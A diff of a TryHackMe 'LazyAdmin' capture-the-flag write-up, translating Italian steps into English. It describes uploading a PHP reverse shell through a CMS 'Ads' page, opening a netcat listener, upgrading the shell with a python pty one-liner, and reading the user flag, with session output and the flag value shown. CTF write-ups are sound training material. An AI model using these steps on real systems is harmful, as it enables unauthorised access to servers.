--- a/CTF-TryHackMe/1. Easy/LazyAdmin/4. Reverse WebShell.md
+++ b/CTF-TryHackMe/1. Easy/LazyAdmin/4. Reverse WebShell.md
@@ -1,10 +1,12 @@
-1) Apriamo il file : /usr/share/webshells/php/php-reverse-shell.php,   e vediamo in che porta ascolterà la nostra reverse shell, in questo caso 4444, e nel caso cambiare nello script anche l'ip address, per vedere l'ip address scrivere nel terminale : ifconfig
-2) Ora apriamo il terminale e apriamo un listener:  nc -lvnp  4444
-3) Ora carica  lo script nella  sezione "Ads" dandogli un nome che finisce con .php
-4) Ora vai nella directory  http://10.10.162.4/content/inc/ads  e apri il file e sstabilisci la reverse shell
-5) Digita il codice python per aggiustarti la shell: python -c 'import pty; pty.spawn("/bin/bash") '
-6) Ora le directory e trovo la user flag:
- listening on [any] 4444 ...
+1) I go in this directory: http://10.10.162.4/content/as/
+2) I login with the credentials found
+3) A time inside I see a section "Ads", here I upload the code of the reverse shell, but before I open a listening port:
+```
+nc -lvnp  <listening port>
+```
+4) Now I go in this directory " http://10.10.162.4/content/inc/ads ", open the file, and spawn the reverse WebShell:
+```
+listening on [any] 4444 ...
 connect to [10.8.34.183] from (UNKNOWN) [10.10.162.4] 41362
 Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
  21:42:21 up  2:21,  0 users,  load average: 0.00, 0.00, 0.00
@@ -55,5 +57,6 @@ examples.desktop
 mysql_login.txt
 user.txt
 $ cat user.txt
-THM{63e5bce9271952aad1113b6f1ac28a07}
+THM{63e5bce9271952aad1113b6f1ac28a07}  <-- User Flag
 $ 
+```
